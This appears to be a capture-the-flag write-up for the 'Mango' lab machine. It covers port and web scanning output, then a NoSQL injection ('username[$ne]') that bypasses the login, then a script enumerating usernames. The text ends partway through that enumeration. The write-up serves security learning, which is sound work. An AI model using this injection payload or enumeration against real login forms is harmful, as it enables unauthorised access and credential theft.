First AutoRecon to map the ports/services

[*] Scanning target 10.10.10.162
[*] Running service detection nmap-quick on 10.10.10.162
[*] Running service detection nmap-full-tcp on 10.10.10.162
[*] Running service detection nmap-top-20-udp on 10.10.10.162
[*] Service detection nmap-quick on 10.10.10.162 finished successfully in 32 seconds
[*] Found ssh on tcp/22 on target 10.10.10.162
[*] Found http on tcp/80 on target 10.10.10.162
[*] Found ssl/http on tcp/443 on target 10.10.10.162
[*] Running task tcp/22/sslscan on 10.10.10.162
[*] Running task tcp/22/nmap-ssh on 10.10.10.162
[*] Running task tcp/80/sslscan on 10.10.10.162
[*] Running task tcp/80/nmap-http on 10.10.10.162
[*] Running task tcp/80/curl-index on 10.10.10.162
[*] Running task tcp/80/curl-robots on 10.10.10.162
[*] Running task tcp/80/wkhtmltoimage on 10.10.10.162
[*] Running task tcp/80/whatweb on 10.10.10.162
[*] Task tcp/22/sslscan on 10.10.10.162 finished successfully in less than a second
[*] Task tcp/80/sslscan on 10.10.10.162 finished successfully in less than a second
[*] Task tcp/80/wkhtmltoimage on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/80/nikto on 10.10.10.162
[*] Running task tcp/80/gobuster on 10.10.10.162
[*] Running task tcp/443/sslscan on 10.10.10.162
[*] Task tcp/80/curl-index on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/nmap-http on 10.10.10.162
[*] Task tcp/80/curl-robots on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/curl-index on 10.10.10.162
[*] Task tcp/443/curl-index on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/curl-robots on 10.10.10.162
[*] Task tcp/443/curl-robots on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/wkhtmltoimage on 10.10.10.162
[*] Task tcp/443/wkhtmltoimage on 10.10.10.162 finished successfully in less than a second
[*] Running task tcp/443/whatweb on 10.10.10.162
[*] Task tcp/80/whatweb on 10.10.10.162 finished successfully in 3 seconds
[*] Running task tcp/443/nikto on 10.10.10.162
[*] Task tcp/443/whatweb on 10.10.10.162 finished successfully in 5 seconds
[*] Running task tcp/443/gobuster on 10.10.10.162
[*] Task tcp/443/sslscan on 10.10.10.162 finished successfully in 15 seconds
[*] Service detection nmap-top-20-udp on 10.10.10.162 finished successfully in 47 seconds
[*] Task tcp/22/nmap-ssh on 10.10.10.162 finished successfully in 16 seconds
[*] [20:13:45] - There are 7 tasks still running on 10.10.10.162
[*] Task tcp/80/nmap-http on 10.10.10.162 finished successfully in 41 seconds
[*] Task tcp/443/nmap-http on 10.10.10.162 finished successfully in 1 minute, 5 seconds
[*] [20:14:45] - There are 5 tasks still running on 10.10.10.162
[*] [20:15:45] - There are 5 tasks still running on 10.10.10.162
[*] Service detection nmap-full-tcp on 10.10.10.162 finished successfully in 3 minutes, 13 seconds
[*] Task tcp/80/gobuster on 10.10.10.162 finished successfully in 7 minutes, 15 seconds
[*] Task tcp/80/nikto on 10.10.10.162 finished successfully in 9 minutes, 36 seconds
[*] Task tcp/443/gobuster on 10.10.10.162 finished successfully in 13 minutes, 21 seconds
[*] Task tcp/443/nikto on 10.10.10.162 finished successfully in 34 minutes, 26 seconds
[*] Finished scanning target 10.10.10.162 in 35 minutes, less than a second
[*] Finished scanning all targets in 35 minutes, less than a second!

Nmap TCP results

Nmap scan report for 10.10.10.162
Host is up, received user-set (0.052s latency).
Scanned at 2020-03-12 20:12:59 EDT for 179s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXYCdNRHET98F1ZTM+H8yrD9KXeRjvIk9e78JkHdzcqCq6zcvYIqEZReb3FSCChJ9mxK6E6vu5xBY7R6Gi0V31dx0koyaieEMd67PU+9UcjaAujbDS3UgYzySN+c5GV/ssmA6wWHu4zz+k+qztqdYFPh0/TgrC/wNPWHOKdpivgoyk3+F/retyGdKUNGjypXrw6v1faHiLOIO+zNHorxB304XmSLEFswiOS8UsjplIbud2KhWPEkY4s4FyjlpfpVdgPljbjijm7kcPNgpTXLXE51oNE3Q5w7ufO5ulo3Pqm0x+4d+SEpCE4g0+Yb020zK+JlKsp2tFJyLqTLan1buN
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqSZ4iBMzBrw2lEFKYlwO2qmw0WPf76ZhnvWGK+LJcHxvNa4OQ/hGuBWCjVlTcMbn1Te7D8jGwPgbcVpuaEld8=
|   256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB1sFdLYacK+1f4J+i+NCAhG+bj8xzzydNhqA1Ndo/xt
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Issuer: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-09-27T14:21:19
| Not valid after:  2020-09-26T14:21:19
| MD5:   b797 d14d 485f eac3 5cc6 2fed bb7a 2ce6
| SHA-1: b329 9eca 2892 af1b 5895 053b f30e 861f 1c03 db95
| -----BEGIN CERTIFICATE-----
| MIIEAjCCAuqgAwIBAgIJAK5QiSmoBvEyMA0GCSqGSIb3DQEBCwUAMIGVMQswCQYD
| VQQGEwJJTjENMAsGA1UECAwETm9uZTENMAsGA1UEBwwETm9uZTEXMBUGA1UECgwO
| TWFuZ28gUHJ2IEx0ZC4xDTALBgNVBAsMBE5vbmUxIDAeBgNVBAMMF3N0YWdpbmct
| b3JkZXIubWFuZ28uaHRiMR4wHAYJKoZIhvcNAQkBFg9hZG1pbkBtYW5nby5odGIw
| HhcNMTkwOTI3MTQyMTE5WhcNMjAwOTI2MTQyMTE5WjCBlTELMAkGA1UEBhMCSU4x
| DTALBgNVBAgMBE5vbmUxDTALBgNVBAcMBE5vbmUxFzAVBgNVBAoMDk1hbmdvIFBy
| diBMdGQuMQ0wCwYDVQQLDAROb25lMSAwHgYDVQQDDBdzdGFnaW5nLW9yZGVyLm1h
| bmdvLmh0YjEeMBwGCSqGSIb3DQEJARYPYWRtaW5AbWFuZ28uaHRiMIIBIjANBgkq
| hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5fimSfgq3xsdUkZ6dcbqGPDmCAJJBOK2
| f5a25At3Ht5r1SjiIuvovDSmMHjVmlbF6qX7C6f7Um+1Vtv/BinZfpuMEesyDH0V
| G/4X5r6o1GMfrvjvAXQ2cuVEIxHGH17JM6gKKEppnguFwVMhC4/KUIjuaBXX9udA
| 9eaFJeiYEpdfSUVysoxQDdiTJhwyUIPnsFrf021nVOI1/TJkHAgLzxl1vxrMnwrL
| 2fLygDt1IQN8UhGF/2UTk3lVfEse2f2kvv6GbmjxBGfWCNA/Aj810OEGVMiS5SLr
| arIXCGVl953QCD9vi+tHB/c+ICaTtHd0Ziu/gGbdKdCItND1r9kOEQIDAQABo1Mw
| UTAdBgNVHQ4EFgQUha2bBOZXo4EyfovW+pvFLGVWBREwHwYDVR0jBBgwFoAUha2b
| BOZXo4EyfovW+pvFLGVWBREwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsF
| AAOCAQEAmyhYweHz0az0j6UyTYlUAUKY7o/wBHE55UcekmWi0XVdIseUxBGZasL9
| HJki3dQ0mOEW4Ej28StNiDKPvWJhTDLA1ZjUOaW2Jg20uDcIiJ98XbdBvSgjR6FJ
| JqtPYnhx7oOigKsBGYXXYAxoiCFarcyPyB7konNuXUqlf7iz2oLl/FsvJEl+YMgZ
| YtrgOLbEO6/Lot/yX9JBeG1z8moJ0g+8ouCbUYI1Xcxipp0Cp2sK1nrfHEPaSjBB
| Os2YQBdvVXJau7pt9zJmPVMhrLesf+bW5CN0WpC/AE1M1j6AfkX64jKpIMS6KAUP
| /UKaUcFaDwjlaDEvbXPdwpmk4vVWqg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Linux 3.18 (92%), Android 4.2.2 (Linux 3.4) (92%), Linux 2.6.32 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/12%OT=22%CT=1%CU=30651%PV=Y%DS=2%DC=T%G=Y%TM=5E6AD0B
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=Z%TS=A)OPS(O1=M
OS:54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%
OS:O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%
OS:DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%
OS:CD=S)IE(R=N)

Uptime guess: 23.448 days (since Tue Feb 18 08:30:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   47.01 ms 10.10.14.1
2   49.55 ms 10.10.10.162

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 12 20:15:58 2020 -- 1 IP address (1 host up) scanned in 193.32 seconds

WhatWeb results:

WhatWeb report for http://10.10.10.162:80
Status    : 403 Forbidden
Title     : 403 Forbidden
IP        : 10.10.10.162
Country   : RESERVED, ZZ

Summary   : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and 
    maintain an open-source HTTP server for modern operating 
    systems including UNIX and Windows NT. The goal of this 
    project is to provide a secure, efficient and extensible 
    server that provides HTTP services in sync with the current 
    HTTP standards. 

    Version      : 2.4.29 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to 
    identify the operating system from the server header. 

    OS           : Ubuntu Linux
    String       : Apache/2.4.29 (Ubuntu) (from server string)

HTTP Headers:
    HTTP/1.1 403 Forbidden
    Date: Fri, 13 Mar 2020 00:14:39 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Content-Length: 277
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
WhatWeb report for https://10.10.10.162:443
Status    : 200 OK
Title     : Mango | Search Base
IP        : 10.10.10.162
Country   : RESERVED, ZZ

Summary   : HTML5, Script, Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and 
    maintain an open-source HTTP server for modern operating 
    systems including UNIX and Windows NT. The goal of this 
    project is to provide a secure, efficient and extensible 
    server that provides HTTP services in sync with the current 
    HTTP standards. 

    Version      : 2.4.29 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTML5 ]
    HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
    HTTP server header string. This plugin also attempts to 
    identify the operating system from the server header. 

    OS           : Ubuntu Linux
    String       : Apache/2.4.29 (Ubuntu) (from server string)

[ Script ]
    This plugin detects instances of script HTML elements and 
    returns the script language/type. 


HTTP Headers:
    HTTP/1.1 200 OK
    Date: Fri, 13 Mar 2020 00:14:40 GMT
    Server: Apache/2.4.29 (Ubuntu)
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 1844
    Connection: close
    Content-Type: text/html; charset=UTF-8

Nikto results

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.162
+ Target Hostname:    10.10.10.162
+ Target Port:        80
+ Start Time:         2020-03-12 20:13:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7864 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2020-03-12 20:22:52 (GMT-4) (574 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.162
+ Target Hostname:    10.10.10.162
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
+ Start Time:         2020-03-12 20:13:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Hostname '10.10.10.162' does not match certificate's names: staging-order.mango.htb
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2020-03-12 20:47:45 (GMT-4) (2065 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Ssl scan

Version: 1.11.13-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 10.10.10.162

Testing SSL server 10.10.10.162 on port 443 using SNI name 10.10.10.162

  TLS Fallback SCSV:
Server supports TLS Fallback SCSV

  TLS renegotiation:
Secure session renegotiation supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.2  256 bits  ECDHE-RSA-CAMELLIA256-SHA384  Curve P-256 DHE 256
Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA256    DHE 2048 bits
Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
Accepted  TLSv1.2  256 bits  AES256-SHA256                
Accepted  TLSv1.2  256 bits  AES256-SHA                   
Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA256           
Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA              
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.2  128 bits  ECDHE-RSA-CAMELLIA128-SHA256  Curve P-256 DHE 256
Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA256    DHE 2048 bits
Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
Accepted  TLSv1.2  128 bits  AES128-SHA256                
Accepted  TLSv1.2  128 bits  AES128-SHA                   
Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA256           
Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA              
Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.1  256 bits  AES256-SHA                   
Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA              
Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.1  128 bits  AES128-SHA                   
Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA              
Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
Accepted  TLSv1.0  256 bits  AES256-SHA                   
Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA              
Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
Accepted  TLSv1.0  128 bits  AES128-SHA                   
Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA              

  SSL Certificate:
    Certificate blob:
-----BEGIN CERTIFICATE-----
MIIEAjCCAuqgAwIBAgIJAK5QiSmoBvEyMA0GCSqGSIb3DQEBCwUAMIGVMQswCQYD
VQQGEwJJTjENMAsGA1UECAwETm9uZTENMAsGA1UEBwwETm9uZTEXMBUGA1UECgwO
TWFuZ28gUHJ2IEx0ZC4xDTALBgNVBAsMBE5vbmUxIDAeBgNVBAMMF3N0YWdpbmct
b3JkZXIubWFuZ28uaHRiMR4wHAYJKoZIhvcNAQkBFg9hZG1pbkBtYW5nby5odGIw
HhcNMTkwOTI3MTQyMTE5WhcNMjAwOTI2MTQyMTE5WjCBlTELMAkGA1UEBhMCSU4x
DTALBgNVBAgMBE5vbmUxDTALBgNVBAcMBE5vbmUxFzAVBgNVBAoMDk1hbmdvIFBy
diBMdGQuMQ0wCwYDVQQLDAROb25lMSAwHgYDVQQDDBdzdGFnaW5nLW9yZGVyLm1h
bmdvLmh0YjEeMBwGCSqGSIb3DQEJARYPYWRtaW5AbWFuZ28uaHRiMIIBIjANBgkq
hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5fimSfgq3xsdUkZ6dcbqGPDmCAJJBOK2
f5a25At3Ht5r1SjiIuvovDSmMHjVmlbF6qX7C6f7Um+1Vtv/BinZfpuMEesyDH0V
G/4X5r6o1GMfrvjvAXQ2cuVEIxHGH17JM6gKKEppnguFwVMhC4/KUIjuaBXX9udA
9eaFJeiYEpdfSUVysoxQDdiTJhwyUIPnsFrf021nVOI1/TJkHAgLzxl1vxrMnwrL
2fLygDt1IQN8UhGF/2UTk3lVfEse2f2kvv6GbmjxBGfWCNA/Aj810OEGVMiS5SLr
arIXCGVl953QCD9vi+tHB/c+ICaTtHd0Ziu/gGbdKdCItND1r9kOEQIDAQABo1Mw
UTAdBgNVHQ4EFgQUha2bBOZXo4EyfovW+pvFLGVWBREwHwYDVR0jBBgwFoAUha2b
BOZXo4EyfovW+pvFLGVWBREwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsF
AAOCAQEAmyhYweHz0az0j6UyTYlUAUKY7o/wBHE55UcekmWi0XVdIseUxBGZasL9
HJki3dQ0mOEW4Ej28StNiDKPvWJhTDLA1ZjUOaW2Jg20uDcIiJ98XbdBvSgjR6FJ
JqtPYnhx7oOigKsBGYXXYAxoiCFarcyPyB7konNuXUqlf7iz2oLl/FsvJEl+YMgZ
YtrgOLbEO6/Lot/yX9JBeG1z8moJ0g+8ouCbUYI1Xcxipp0Cp2sK1nrfHEPaSjBB
Os2YQBdvVXJau7pt9zJmPVMhrLesf+bW5CN0WpC/AE1M1j6AfkX64jKpIMS6KAUP
/UKaUcFaDwjlaDEvbXPdwpmk4vVWqg==
-----END CERTIFICATE-----
    Version: 2
    Serial Number: ae:50:89:29:a8:06:f1:32
    Signature Algorithm: sha256WithRSAEncryption
    Issuer: /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
    Not valid before: Sep 27 14:21:19 2019 GMT
    Not valid after: Sep 26 14:21:19 2020 GMT
    Subject: /C=IN/ST=None/L=None/O=Mango Prv Ltd./OU=None/CN=staging-order.mango.htb/emailAddress=admin@mango.htb
    Public Key Algorithm: rsaEncryption
    RSA Public Key: (2048 bit)
      Public-Key: (2048 bit)
      Modulus:
          00:e5:f8:a6:49:f8:2a:df:1b:1d:52:46:7a:75:c6:
          ea:18:f0:e6:08:02:49:04:e2:b6:7f:96:b6:e4:0b:
          77:1e:de:6b:d5:28:e2:22:eb:e8:bc:34:a6:30:78:
          d5:9a:56:c5:ea:a5:fb:0b:a7:fb:52:6f:b5:56:db:
          ff:06:29:d9:7e:9b:8c:11:eb:32:0c:7d:15:1b:fe:
          17:e6:be:a8:d4:63:1f:ae:f8:ef:01:74:36:72:e5:
          44:23:11:c6:1f:5e:c9:33:a8:0a:28:4a:69:9e:0b:
          85:c1:53:21:0b:8f:ca:50:88:ee:68:15:d7:f6:e7:
          40:f5:e6:85:25:e8:98:12:97:5f:49:45:72:b2:8c:
          50:0d:d8:93:26:1c:32:50:83:e7:b0:5a:df:d3:6d:
          67:54:e2:35:fd:32:64:1c:08:0b:cf:19:75:bf:1a:
          cc:9f:0a:cb:d9:f2:f2:80:3b:75:21:03:7c:52:11:
          85:ff:65:13:93:79:55:7c:4b:1e:d9:fd:a4:be:fe:
          86:6e:68:f1:04:67:d6:08:d0:3f:02:3f:35:d0:e1:
          06:54:c8:92:e5:22:eb:6a:b2:17:08:65:65:f7:9d:
          d0:08:3f:6f:8b:eb:47:07:f7:3e:20:26:93:b4:77:
          74:66:2b:bf:80:66:dd:29:d0:88:b4:d0:f5:af:d9:
          0e:11
      Exponent: 65537 (0x10001)
    X509v3 Extensions:
      X509v3 Subject Key Identifier: 
        85:AD:9B:04:E6:57:A3:81:32:7E:8B:D6:FA:9B:C5:2C:65:56:05:11
      X509v3 Authority Key Identifier: 
        keyid:85:AD:9B:04:E6:57:A3:81:32:7E:8B:D6:FA:9B:C5:2C:65:56:05:11

      X509v3 Basic Constraints: critical
        CA:TRUE
  Verify Certificate:
    self signed certificate

  SSL Certificate:
Signature Algorithm: sha256WithRSAEncryption
RSA Key Strength:    2048

Subject:  staging-order.mango.htb
Issuer:   staging-order.mango.htb

Not valid before: Sep 27 14:21:19 2019 GMT
Not valid after:  Sep 26 14:21:19 2020 GMT

Browsing the two websites, on ports 80 and 443. The web server on the 80 returns a 403 error and the https server returns a certificate error

I add a new entry in the /etc/hosts file for the staging-order.mango.htb host

kali@kali:~$ cat /etc/hosts
127.0.0.1   localhost
127.0.1.1   kali
10.10.10.162    staging-order.mango.htb
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Using the FQDN we land on a web page: website-80

So I will do again the nikto scan, this time against the FQDN, and also the dirsearch will run using the name.

The new nikto scans show no other things.

Using dirsearch to enumerate hidden directory

kali@kali:~$ /home/kali/tools/dirsearch/dirsearch.py -u staging-order.mango.htb -E -x 403

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 8673

Error Log: /home/kali/tools/dirsearch/logs/errors-20-03-13_09-00-26.log

Target: staging-order.mango.htb

[09:00:26] Starting: 
[09:01:01] 302 -    0B  - /home.php  ->  index.php
[09:01:02] 200 -    4KB - /index.php
[09:01:03] 200 -    4KB - /index.php/login/
[09:01:23] 200 -    0B  - /vendor/composer/autoload_classmap.php
[09:01:23] 200 -    0B  - /vendor/autoload.php
[09:01:23] 200 -    0B  - /vendor/composer/autoload_files.php
[09:01:23] 200 -    0B  - /vendor/composer/autoload_namespaces.php
[09:01:23] 200 -    0B  - /vendor/composer/autoload_psr4.php
[09:01:23] 200 -    0B  - /vendor/composer/autoload_real.php
[09:01:23] 200 -    0B  - /vendor/composer/ClassLoader.php
[09:01:23] 200 -    4KB - /vendor/composer/installed.json
[09:01:23] 200 -    3KB - /vendor/composer/LICENSE
[09:01:23] 200 -    0B  - /vendor/composer/autoload_static.php

Analyzing the files found during by dirsearch we know the service uses Mongo as backend DB:

kali@kali:~$ curl http://staging-order.mango.htb/vendor/composer/installed.json
[
    {
        "name": "alcaeus/mongo-php-adapter",
        "version": "1.1.9",
        "version_normalized": "1.1.9.0",
        "source": {
            "type": "git",
            "url": "https://github.com/alcaeus/mongo-php-adapter.git",
            "reference": "93b81ebef1b3a4d3ceb72f13a35057fe08a5048f"
        },

To recap the VM is running the software/services:

OpenSSH 7.6p1
Apache 2.4.29
Mongo DB

Exploitation

Very often the MongoDB/PHP applications are vulnerable to noSQL Injection Using BurpSuite I will check if the application is vulnerable. I'm intercepting the login request, using a random username/password. I try to bypass the authentication process.

I intercept the login request and insert the [$ne] operator in the username and in the password POST parameters trying to fool the app, and this works. Changing the POST data from

username=test&password=test&login=login

to

username[$ne]=test&password[$ne]=test&login=login

we bypass the authentication method and we are redirect to a "work in progress" page and we found the admin email. There are some tools to take advantage of this kind of injections. I'll use https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration.git to discover users and passwords

kali@kali:~/tools/Nosql-MongoDB-injection-username-password-enumeration$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
